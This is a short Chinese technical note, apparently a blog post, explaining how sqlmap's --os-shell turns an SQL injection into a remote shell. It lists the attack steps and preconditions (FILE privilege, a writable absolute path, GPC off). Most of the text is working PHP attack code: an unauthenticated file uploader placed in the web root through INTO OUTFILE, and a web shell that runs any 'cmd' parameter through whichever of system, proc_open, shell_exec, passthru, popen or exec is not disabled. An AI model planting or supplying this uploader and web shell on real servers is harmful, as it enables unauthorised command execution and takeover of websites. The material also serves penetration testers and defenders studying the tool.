sqlmap --os-shell原理
过程
1、发现注入点
2、使用sqlmap中--os-shell参数
3、选择语言
4、设置路径
5、建立os-shell 执行命令
原理研究
用into outfile函数将一个可以用来上传的tmpukjhb.php文件写到网站的根目录下
然后利用tmpukjhb.php上传了一个tmpbezal.php的文件,tmpbezal.php这个文件可以用来执行系统命令,并且将结果返回出来
当--os-shell退出后会调用后门脚本删除上传文件后,进行自删除
代码
tmpujqbu.php
<?php
if (isset($_REQUEST["upload"])) {
$dir = $_REQUEST["uploadDir"];
if (phpversion() < '4.1.0') {
$file = $HTTP_POST_FILES["file"]["name"];
@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir . "/" . $file) or die();
} else {
$file = $_FILES["file"]["name"];
@move_uploaded_file($_FILES["file"]["tmp_name"], $dir . "/" . $file) or die();
}
@chmod($dir . "/" . $file, 0755);
echo "File uploaded";
} else {
echo "<form action=" . $_SERVER["PHP_SELF"] . " method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/var/www/html/hackable/uploads/> <input type=submit name=upload value=upload></form>";
} ?>
tmpbezal.php
<?php
$c = $_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time', 0);
$z = @ini_get('disable_functions');
if (!empty($z)) {
$z = preg_replace('/[, ]+/', ',', $z);
$z = explode(',', $z);
$z = array_map('trim', $z);
} else {
$z = array();
}
$c = $c . " 2>&1\n";
function f($n) {
global $z;
return is_callable($n) and !in_array($n, $z);
}
if (f('system')) {
ob_start();
system($c);
$w = ob_get_contents();
ob_end_clean();
} elseif (f('proc_open')) {
$y = proc_open($c, array(
array(
pipe,
r
) ,
array(
pipe,
w
) ,
array(
pipe,
w
)
) , $t);
$w = NULL;
while (!feof($t[1])) {
$w.= fread($t[1], 512);
}
@proc_close($y);
} elseif (f('shell_exec')) {
$w = shell_exec($c);
} elseif (f('passthru')) {
ob_start();
passthru($c);
$w = ob_get_contents();
ob_end_clean();
} elseif (f('popen')) {
$x = popen($c, r);
$w = NULL;
if (is_resource($x)) {
while (!feof($x)) {
$w.= fread($x, 512);
}
}
@pclose($x);
} elseif (f('exec')) {
$w = array();
exec($c, $w);
$w = join(chr(10) , $w) . chr(10);
} else {
$w = 0;
}
print "<pre>" . $w . "</pre>"; ?>
使用条件
FILE 权限
可写的绝对路径
PHP GPC off